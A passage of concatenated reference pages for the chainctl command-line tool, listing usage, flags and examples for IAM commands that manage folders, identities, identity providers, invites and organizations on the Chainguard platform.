19d3a64f20c64ba3ccf1bc86ce59d03e705959ad/efb53f2857d567f2 --description "A description of the folder." # Remove a folder's description chainctl iam folders update my-folder --description "" Options -d, --description string The updated description for the folder. -h, --help help for update -n, --name string The updated name for the folder. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam identities URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities Identity management. Options -h, --help help for identities Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam identities create - Create a new identity. chainctl iam identities delete - Delete one or more identities. chainctl iam identities describe - View the details of an identity. chainctl iam identities list - List identities. chainctl iam identities update - Update an identity --- ### chainctl iam identities create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create Create a new identity. chainctl iam identities create NAME {--filename FILE | {--identity-issuer=ISS | --identity-issuer-pattern=PAT} {--subject=SUB | --subject-pattern=PAT} [--audience=AUD | --audience-pattern=PAT] [--claim-pattern=claim:pattern,claim:pattern...] | --identity-issuer=ISS --issuer-keys=KEYS --subject=SUB [--expiration=yyyy-mm-dd]} [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] [--output=id|json|table] Examples # Create a static identity using the default expiration. chainctl iam identities create my-identity --identity-issuer=https://issuer.mycompany.com --issuer-keys=deadbeef --subject=1234 # Create an identity with literal values to match from claims. chainctl iam identities create my-identity --identity-issuer=https://issuer.mycompany.com --subject=1234 # Create an identity using patterns to match claims chainctl iam identities create my-identity --identity-issuer-pattern="https://*.mycompany\.com" --subject-pattern="^\d{4}$" # Create an identity from a JSON file definition and bind to a role chainctl iam identities create my-identity -f path/to/identity-definition.json --role=viewer Options --audience string The audience of the identity (optional). --audience-pattern string A pattern to match the audience of the identity (optional). --claim-pattern stringArray A comma-separated list of claim:pattern pairs of custom claims to match for this identity (optional). -d, --description string The description of the resource. --expiration string The time when the issuer_keys will expire. Defaults to / Maximum of 30 days after creation time (yyyy-mm-dd). -f, --filename string A file that contains the identity definition, in either YAML or JSON. -h, --help help for create --identity-issuer string The issuer of the identity. --identity-issuer-pattern string A pattern to match the issuer of the identity. --issuer-keys string JWKS-formatted public keys for the issuer. -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --role strings A comma separated list of names or IDs of roles to bind this identity to (optional). --service-principal string The service principal that is allowed to assume this identity. --subject string The subject of the identity. --subject-pattern string A pattern to match the subject of the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. chainctl iam identities create github - chainctl iam identities create gitlab - --- ### chainctl iam identities create github URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create_github/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create github chainctl iam identities create github NAME --github-repo=REPO [--github-ref=REF] [--github-audience=AUD] [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] [--output=id|json|table] Examples # Create a GitHub Actions identity for any branch in a repo chainctl iam identities create github my-gha-identity --github-repo=my-org/repo-name --parent=eng-org # Create a GitHub Actions identity for a given branch in a repo and bind to a role chainctl iam identities create github my-gha-identity --github-repo=my-org/repo-name --github-ref=refs/heads/test-branch --role=owner Options -d, --description string The description of the resource. --github-audience string The audience for the GitHub OIDC token --github-ref string The branch reference for the executing action (optional). --github-repo string The name of a GitHub repo where the action executes. -h, --help help for github -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --role strings A comma separated list of names or IDs of roles to bind this identity to (optional). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities create - Create a new identity. --- ### chainctl iam identities create gitlab URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create_gitlab/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create gitlab chainctl iam identities create gitlab NAME --project-path=GITLAB-GROUP/GITLAB-PROJECT --ref-type={tag|branch} [--ref=REF] [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] [--output=id|json|table] Examples # Create a Gitlab CI identity for any branch in a given Gitlab project chainctl iam identities create gitlab my-gitlab-identity --project-path=my-group/my-project --ref-type=branch --parent=eng-org # Create a Gitlab CI identity for a given branch in a Gitlab project and bind to a role chainctl iam identities create gitlab my-gitlab-identity --project-path=my-group/my-project --ref-type=branch --ref=main --role=owner Options -d, --description string The description of the resource. -h, --help help for gitlab -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --project-path string The name of a Gitlab project where the action executes in the form "group-name/project-name[/foo/bar]". You can use a "*" for project-name (or sub-projects) to match any project in the group. --ref string The reference for the executing action. If left empty or "*", all references will match. --ref-type string The type of reference for the executing action, must be either "tag" or "branch". --role strings A comma separated list of names or IDs of roles to bind this identity to (optional). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities create - Create a new identity. --- ### chainctl iam identities delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities delete Delete one or more identities. chainctl iam identities delete {IDENTITY_NAME | IDENTITY_ID | --expired [--parent=PARENT]} [--yes] Examples # Delete an identity by name chainctl iam identities delete my-identity # Delete all expired static identities in an organization chainctl iam identities delete --expired --parent=my-org Options --expired Delete all expired identities. -h, --help help for delete --parent string Name or ID of the parent location to delete expired identities from. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities describe View the details of an identity. chainctl iam identities describe {IDENTITY_NAME | IDENTITY_ID} [flags] Options -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities list List identities. chainctl iam identities list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--name=NAME] [--relationship={aws|claim_match|pull_token|service_principal|static}] [--expired] [--output=id|json|table] Examples # List all identities. chainctl iam identities list # List all static identities. chainctl iam identities list --relationship=static # Filter identities by name. chainctl iam identities list --name=my-identity # List expired identities chainctl iam identities list --expired Options --expired Return only expired static identities. -h, --help help for list --name string Filter identities by name. --parent string The name or id of the parent location to list identities from. --relationship string Filter identities by relationship type (aws, claim_match, pull_token, service_principal, static). Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities update Update an identity chainctl iam identities update IDENTITY_NAME | IDENTITY_ID [--description=DESC] [--identity-issuer=ISS | --identity-issuer-pattern=PAT] [--subject=SUB | --subject-pattern=PAT] [--audience=AUD | --audience-pattern=PAT] [--claim-pattern=claim:pattern,claim:pattern...] [--issuer-keys=KEYS] [--expiration=yyyy-mm-dd] [--output=id|json|table] [flags] Examples # Update the issuer of an identity. chainctl iam identities update my-identity --identity-issuer=https://new-issuer.mycompany.com # Update the subject to a pattern and update the audience of an identity. chainctl iam identities update my-identity --subject-pattern="^\d{4}$" --audience=some-audience Options --audience string The audience of the identity (optional). --audience-pattern string A pattern to match the audience of the identity (optional). --claim-pattern stringArray A comma-separated list of claim:pattern pairs of custom claims to match for this identity. --description string A description of the identity (optional). --expiration string The time when the issuer_keys will expire. Defaults to / Maximum of 30 days after creation time (yyyy-mm-dd). -h, --help help for update --identity-issuer string The issuer of the identity. --identity-issuer-pattern string A pattern to match the issuer of the identity. --issuer-keys string JWKS-formatted public keys for the issuer. --subject string The subject of the identity. --subject-pattern string A pattern to match the subject of the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identity-providers URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers customer managed identity provider management Options -h, --help help for identity-providers Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam identity-providers create - Create an identity provider chainctl iam identity-providers delete - Delete an identity provider. chainctl iam identity-providers list - List identity providers. chainctl iam identity-providers update - Update an identity provider --- ### chainctl iam identity-providers create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers create Create an identity provider chainctl iam identity-providers create --parent ORGANIZATION_NAME | ORGANIZATION_ID [--name=NAME] [--description=DESCRIPTION] --oidc-issuer=ISSUER --oidc-client-id=CLIENTID --oidc-client-secret=CLIENTSECRET [--oidc-additional-scopes=SCOPE,...] --default-role=ROLE [--output=id|json|table] Examples # Setup a custom OIDC provider and bind new users to the viewer role chainctl iam identity-provider create --name=google --parent=example \ --oidc-issuer=https://accounts.google.com \ --oidc-client-id=foo \ --oidc-client-secret=bar \ --default-role=viewer Options --configuration-type string Type of identity provider. Only OIDC supported currently (default "OIDC") --default-role string Role to grant users on first login --description string Description of identity provider -h, --help help for create --name string Name of identity provider --oidc-additional-scopes stringArray additional scopes to request for OIDC type identity provider --oidc-client-id string client id for OIDC type identity provider --oidc-client-secret string client secret for OIDC type identity provider --oidc-issuer string Issuer URL for OIDC type identity provider --parent string The name or ID of the location the identity provider belongs to. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers delete Delete an identity provider. chainctl iam identity-providers delete IDENTITY_PROVIDER_ID|IDENTITY_PROVIDER_NAME [--yes] [--output=id] Examples # Delete an identity provider by ID chainctl iam identity-providers delete 9b6da6e64b45129eb4e9f9f3ce9b69ca2a550c6b/034e4afcda8c0b07 # Delete an identity provider by name chainctl iam identity-providers delete my-idp Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers list List identity providers. chainctl iam identity-providers list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=json|table|tree] Examples # List identity providers chainctl iam identity-providers list # Filter list by location chainctl iam identity-providers list --parent=my-org Options -h, --help help for list --parent string List identity providers in this location and its descendants. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers update Update an identity provider chainctl iam identity-providers update IDENTITY_PROVIDER_ID [--name=NAME] [--description=DESCRIPTION] [--oidc-issuer=ISSUER] [--oidc-client-id=CLIENTID] [--oidc-client-secret=CLIENTSECRET] [--oidc-additional-scopes=SCOPE,...] [--default-role=ROLE] [--output=id|json|table] Examples # Update name and description of an identity provider by ID chainctl iam identity-provider update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --name=new-name --description=new-description # Update the default role for an identity provider by name chainctl iam identity-provider update my-idp --default=role=viewer Options --configuration-type string Type of identity provider. Only OIDC supported currently (default "OIDC") --default-role string Optional role to grant users on first login --description string Description of identity provider -h, --help help for update --name string Name of identity provider --oidc-additional-scopes stringArray additional scopes to request for OIDC type identity provider --oidc-client-id string client id for OIDC type identity provider --oidc-client-secret string client secret for OIDC type identity provider --oidc-issuer string Issuer URL for OIDC type identity provider -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam invites URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites Manage invite codes that register identities with Chainguard. Options -h, --help help for invites Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam invites create - Generate an invite code to identities with Chainguard. chainctl iam invites delete - Delete invite codes chainctl iam invites list - List organization and folder invites. --- ### chainctl iam invites create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites create Generate an invite code to identities with Chainguard. chainctl iam invites create [ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--role=ROLE_ID|ROLE_NAME] [--ttl=TTL_DURATION] [--email=EMAIL] [--single-use] [--output=id|json|table] Examples # Create an invite that will be valid for 5 days: chainctl iam invite create my-org-name --role=viewer --ttl=5d # Create an invite that only Kim can accept: chainctl iam invite create my-org-name --email=kim@example.com # Create an invite code that can only be used once. chainctl iam invite create my-org-name --single-use Options --email string The email address that is allowed to accept this invite code. -h, --help help for create --role string Role is used to role-bind the invited to the associated location. --single-use The invite can only be used once before it is invalidated. --ttl duration Duration the invite code will be valid. (default 168h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam invites delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites delete Delete invite codes chainctl iam invites delete {INVITE_ID... | --expired} [--yes] [flags] Options --expired When true, delete all expired invite codes. -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam invites list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites list List organization and folder invites. chainctl iam invites list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Examples # List all accessible invites chainctl iam invites list # Filter invites by location chainctl iam invites list --parent=my-org Options -h, --help help for list --parent string List invites from this location. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam organizations URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations IAM organization interactions. Options -h, --help help for organizations Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam organizations delete - Delete an organization. chainctl iam organizations describe - Describe an organization. chainctl iam organizations list - List organizations. --- ### chainctl iam organizations delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations delete Delete an organization. chainctl iam organizations delete [ORGANIZATION_NAME | ORGANIZATION_ID] [--skip-refresh] [--yes] Examples # Delete an organization by ID chainctl iam organizations delete e533448ca9770c46f99f2d86d60fc7101494e4a3 # Delete an organization by name chainctl iam organizations delete my-org # Delete an organization to be selected interactively chainctl iam organizations delete Options -h, --help help for delete --skip-refresh Skips attempting to reauthenticate and refresh the Chainguard auth token if it becomes out of date. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam organizations describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations describe Describe an organization. chainctl iam organizations describe [ORGANIZATION_NAME | ORGANIZATION_ID] [--active-within=DURATION] [--output=json] Options --active-within duration How recently a record must have been active to be listed. Zero will return all records. (default 24h0m0s) -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam organizations list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations list List organizations. chainctl iam organizations list [--output=id|json|table|tree] Options -h, --help help for list Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam role-bindings URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings IAM role-bindings resource interactions. Options -h, --help help for role-bindings Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform 